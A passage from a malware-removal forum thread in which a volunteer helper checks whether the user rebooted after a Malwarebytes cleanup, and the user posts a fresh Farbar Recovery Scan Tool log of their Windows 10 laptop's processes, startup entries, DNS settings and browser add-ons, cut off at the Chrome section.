2016-03-09 19:34 - 2014-07-07 11:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-09 19:34 - 2013-12-13 19:44 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\AuthenTec
2016-03-09 19:31 - 2015-12-19 19:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-09 19:30 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-09 19:30 - 2015-10-30 00:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-09 19:28 - 2015-10-30 01:21 - 00000000 ____D C:\WINDOWS\INF
2016-03-09 19:25 - 2015-12-19 19:15 - 04967824 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-09 18:52 - 2015-03-31 19:40 - 00000000 ____D C:\Program Files (x86)\Fitbit Connect
2016-03-09 18:31 - 2014-07-07 11:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-09 18:20 - 2013-09-16 08:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 18:16 - 2013-09-16 08:59 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-03-09 18:15 - 2015-10-30 01:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-09 17:47 - 2014-07-07 11:35 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-09 17:34 - 2014-07-08 15:30 - 00000000 ____D C:\Users\levilaing\AppData\Local\Adobe
2016-03-09 16:46 - 2015-12-19 19:25 - 00000000 ____D C:\Users\levilaing
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files\Google
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-09 16:45 - 2015-09-03 10:03 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\Temp
2016-03-09 16:36 - 2015-10-30 00:28 - 00008192 ___SH C:\WINDOWS\system32\config\ELAM
2016-03-09 16:26 - 2015-09-01 10:51 - 00002416 _____ C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-03-09 16:26 - 2013-12-13 17:53 - 00000000 __RDO C:\Users\levilaing\SkyDrive
2016-03-09 10:07 - 2015-10-30 01:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 16:57 - 2013-09-13 13:01 - 00000000 ____D C:\Users\levilaing\AppData\Local\Packages
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Users\levilaing\AppData\Local\Google
2016-03-08 16:54 - 2014-01-16 14:20 - 00000000 ____D C:\ProgramData\Google
2016-03-08 16:53 - 2012-12-20 18:47 - 00000000 ____D C:\Program Files (x86)\CyberLink
2016-03-08 16:53 - 2012-12-20 18:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 16:52 - 2012-12-20 18:46 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-03-08 16:51 - 2015-09-28 19:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2016-03-08 16:50 - 2015-09-28 19:17 - 00000000 ____D C:\Program Files\Canon
2016-03-08 16:50 - 2014-01-21 17:04 - 00000000 ____D C:\Program Files (x86)\Canon
2016-03-07 17:19 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\rescache
2016-03-01 13:45 - 2015-12-19 19:24 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 13:40 - 2012-12-20 19:23 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-01 13:33 - 2015-10-30 03:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 __RSD C:\WINDOWS\Media
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-03-01 13:27 - 2015-12-24 12:27 - 00000000 ____D C:\ProgramData\Norton
2016-03-01 08:26 - 2015-12-07 08:59 - 00002005 _____ C:\Users\levilaing\Desktop\Dashlane.lnk
2016-03-01 08:26 - 2015-12-07 08:58 - 00000000 ____D C:\Users\levilaing\AppData\Roaming\Dashlane
2016-02-29 13:22 - 2013-09-13 13:11 - 00000000 ____D C:\Users\levilaing\AppData\Local\ElevatedDiagnostics
2016-02-23 16:21 - 2015-12-15 14:22 - 00000000 ____D C:\Users\levilaing\Desktop\Tor Browser
2016-02-17 19:42 - 2014-10-21 09:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\ProgramData\Oracle
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-17 19:41 - 2016-01-05 13:15 - 00000000 ____D C:\Users\levilaing\.oracle_jre_usage
2016-02-17 19:41 - 2014-10-21 09:58 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-17 19:18 - 2016-01-05 13:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-16 13:23 - 2016-01-05 13:36 - 00000000 ____D C:\Users\levilaing\AppData\Local\CrashDumps
2016-02-12 18:00 - 2013-12-24 11:04 - 00000000 ____D C:\Program Files (x86)\HP SimplePass
2016-02-09 14:04 - 2013-08-22 07:25 - 00000167 _____ C:\WINDOWS\win.ini
2016-02-09 09:02 - 2013-09-16 14:19 - 00000000 ____D C:\Users\levilaing\Documents\Youcam

==================== Files in the root of some directories =======

2015-12-18 17:54 - 2015-12-18 17:54 - 0001035 _____ () C:\Program Files (x86)\suit.log
2014-04-18 15:32 - 2014-04-18 15:32 - 0007168 _____ () C:\Users\levilaing\AppData\Roaming\SQLiteManager3.pref
2014-02-04 20:57 - 2014-02-04 20:57 - 0000045 _____ () C:\Users\levilaing\AppData\Roaming\WB.CFG
2014-05-23 10:53 - 2014-05-23 10:53 - 0002165 _____ () C:\Users\levilaing\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\levilaing\AppData\Local\Temp\sqlite3.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-03-02 03:16

==================== End of FRST.txt ============================

#12
pystryker

Posted 09 March 2016 - 08:16 PM

Trusted Helper

Malware Removal
3,912 posts

Hello

You did reboot after running Malwarebytes, correct? I ask because the log says the file I wanted to get rid of has "Delete on Reboot" beside it. That usually means the machine has not been rebooted. It's not showing up in the fresh FRST log, but I want to be sure as this infection can return if that file isn't removed. Please let me know, and we'll continue. :thumbsup:

#13
LLL31

Posted 09 March 2016 - 08:40 PM

Member

Topic Starter
Member
15 posts

I just did it again just to be sure.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by levilaing (administrator) on LEVISPC (09-03-2016 20:35:45)
Running from C:\Users\levilaing\Desktop
Loaded Profiles: levilaing (Available Profiles: levilaing)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamservice.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Windows\System32\valWBFPolicyService.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10586.113_none_7689896a26389b16\TiWorker.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbam.exe
(AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
() C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\conathst.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.6568.46271.0_x64__8wekyb3d8bbwe\HxTsr.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-10-14] (IDT, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-07-17] (Synaptics Incorporated)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [401192 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201512 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [VitaKeyTSR] => C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisTSR.exe [379248 2010-03-25] (Egis Technology Inc. )
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1282120 2013-05-02] (CANON INC.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-29] (Oracle Corporation)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Power2GoExpress8] => C:\Program Files (x86)\CyberLink\Power2Go8\Power2GoExpress8.exe [1711680 2013-01-27] (CyberLink Corp.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Dashlane] => C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe [227712 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [DashlanePlugin] => C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe [285568 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoLogOff] 0
Lsa: [Notification Packages] EgisPwdFilter EgisDSPwdFilter
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [DhcpNameServer] 82.163.142.7

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\levilaing\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-02-29] (Dashlane)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO-x32: Wondershare Video Converter Ultimate -> {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} -> C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRIEPlugin.dll [2013-06-18] (Wondershare Software Co., Ltd.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-17] (Oracle Corporation)
BHO-x32: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-17] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\levilaing\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-02-29] (Dashlane)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default
FF DefaultSearchEngine: DuckDuckGo
FF DefaultSearchEngine.US: DuckDuckGo
FF SelectedSearchEngine: DuckDuckGo
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.)
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll [2013-06-07] ( HP)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\duckduckgo.xml [2014-10-16]
FF Extension: Ixquick Toolbar - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\extensions\{0D4B5813-2CB5-439D-839C-4638597EFAFA}.xpi [2016-01-12]
FF Extension: Dashlane - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-12-22]
FF Extension: DuckDuckGo Plus - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2016-03-09]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\[email protected] [2016-02-12] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon [2016-01-18]
FF HKLM-x32\...\Firefox\Extensions: [{41ecbc0b-34d5-4cd4-935f-253a30e2cb7e}] - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt
FF Extension: SimplePass Online Accounts Extension - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt [2013-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt
FF Extension: Wondershare Video Converter Ultimate - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt [2015-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt

Chrome:
=======
